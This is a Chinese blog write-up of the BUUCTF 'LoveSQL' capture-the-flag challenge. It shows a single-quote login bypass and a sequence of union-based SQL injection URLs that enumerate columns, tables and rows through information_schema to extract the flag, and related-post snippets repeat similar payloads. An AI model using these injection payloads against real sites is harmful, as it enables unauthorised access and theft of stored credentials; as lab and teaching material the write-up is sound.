BUU[极客大挑战]LoveSQL

最新推荐文章于 2024-04-10 14:40:24 发布
最新推荐文章于 2024-04-10 14:40:24 发布
阅读量315 收藏
点赞数
文章标签: SQL注入 数据库 信息泄露 安全防护 Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Marsper/article/details/109729790
版权

题目链接:http://8d2d10b1-b8e7-4ce4-a2f2-6b58d8c77ae9.node3.buuoj.cn/
在这里插入图片描述
首先,测试发现是单引号的字符型注入
万能密码登录测试
用户名:admin’ or 1=1 #
密码:1
在这里插入图片描述
登陆成功后使用联合查询。
注意:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23

一、爆字段
使用order by语句

check.php?username=admin' order by 1 %23&password=1
check.php?username=admin' order by 4 %23&password=1

一直到4时出现报错。
在这里插入图片描述
所以有3个字段。

二、查看回显位置
使用union select语句

check.php?username=1' union select 1,2,3%23&password=1

在这里插入图片描述
如图,所以回显位是2和3。

三、爆数据库

check.php?username=1' union select 1,database(),version()%23&password=1

在这里插入图片描述
爆出数据库名:geek
版本:10.3.18-MariaDB

四、爆数据库的表

check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

在这里插入图片描述
数据库表名有:
geekuser
l0ve1ysq1
因为本题题目为LoveSQL,表名应该就是l0ve1ysq1。

五、爆表的列名

check.php?username=1' 
union select 1,2,group_concat(column_name) 
from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

在这里插入图片描述
列名有:id,username,password

六、爆其中的内容,找出flag

check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

在这里插入图片描述
往左拉到最后找到flag。
在这里插入图片描述
本题结束。

曦枳icon.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[buuoj][极客挑战 2019]LoveSQL
qq_42250840的博客
06-27 168
考点: sql注入 复现: 进去之后我们试一下万能密码先 转到了check.php,告诉我们用户名和密码,但是并不是flag 考虑注入 先查询字段数: admin' order by 1 # admin' order by 2 # admin' order by 3 # admin' order by 4 # 到4的时候报错,一共有3个字段 接下来用union查询测试注入点: 1' union select 1,2,3 # 找到回显位置 查询数据库名 1' union select 1,2,da
【pwn】2022 极客挑战
woodwhale的博客
11-22 1530
2022 极客挑战 pwn题解
极客挑战2023 Web方向题解wp 全
Jay17的博客
11-28 4801
极客挑战2023 Web方向题解wp 全
极客挑战 2019】EasySQL
Knsec
05-13 8849
[极客挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
[极客挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 3203
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 9213
SQL注入。
[极客挑战 2024]web部分题解(已完结!),2024年最新学习指南
2401_84185471的博客
04-10 1329
while low
【python】OCR
bryant_meng
12-16 3134
先看看百度百科对 OCR 的定义: OCR (Optical Character Recognition,光学字符识别)是指电子设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然后用字符识别方法将形状翻译成计算机文字的过程;即,针对印刷体字符,采用光学的方式将纸质文档中的文字转换成为黑白点阵的图像文件,并通过识别软件将图像中的文字转换成文本格式,供文字处理软件进一步编辑加工的技术。如何除错或利用辅助信息提高识别正确率,是OCR最重要的课题,ICR(Intelligent C.
buuctf web [极客挑战 2019]Http
m0_61903191的博客
09-18 315
X-Forwarded-For://如果提示只能由本地访问,这里内容必须改为127.0.0.1如果给了其他ip,那就改为其他IP地址.但是页面中有提示:It doesn't come from 'https://Sycsecret.buuoj.cn'所以,我们添加Referer:https://Sycsecret.buuoj.cn。User-Agent: //一般这个地方也需要改,看题目给的啥提示来改.Referer://这地方也需要改,看看题目给的提示,看给哪个url。检查了一下源码,有一个跳转页面。
BUUCTF__[极客挑战 2019]Http_题解
风过江南乱的博客
06-21 4000
前言 在35°C的夏天,停了一天的电,晚上才来电,已经ye死 又是一题基础水题。 题目 首先打开是挺好看的一个前端页面。介绍了一个安全技术小组。 做题第一步,当然是F12大法。 于是发现Secret.php ,先访问,提示你不是来自https://www.Sycsecret.com 当然,题目是http ,http有一个知识点就是HTTP报文 header ,有请求头和响应头。也就是一些协议内容。 ...
buuctf_LoveSQL
qq_61968245的博客
12-22 2641
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges 0x02 题目
Buuctf-[极客挑战 2019]HardSQL
m0_63563528的博客
04-13 273
的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格。我们知道,出现这个说明闭合成功了,但是之后发现它过滤了好多字符和语句,我输入。拼接一下flag,把重复部分删咯,就可以成功提交。又得到了:98-8e23-3728c2f96a1d}报错注入回显嘛,直接获取数据库名“geek”空格被过滤了 ,怎样绕过呢?我来试一下:输入1'(or)#
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 297
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
极客挑战2020_巅峰12强杀出重围!2020“巅峰极客”网络安全技能挑战赛线上初赛圆满结束...
weixin_39822728的博客
12-15 321
9月26日18时,由四川省网信办指导,成都市网信办、成都高新区管委会、中国电子科技网络安全有限公司主办,成都国信安信息产业基地有限公司承办的2020第三届“巅峰极客”网络安全技能挑战赛线上初赛圆满结束。自2018年首届“巅峰极客”网络安全技能挑战赛举办以来该赛事已成为国家级网络安全知名赛事品牌并永久落户蓉城今年的“巅峰极客”大赛以“聚焦网络安全防护体系、助力工业互联网创新发展”为主...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值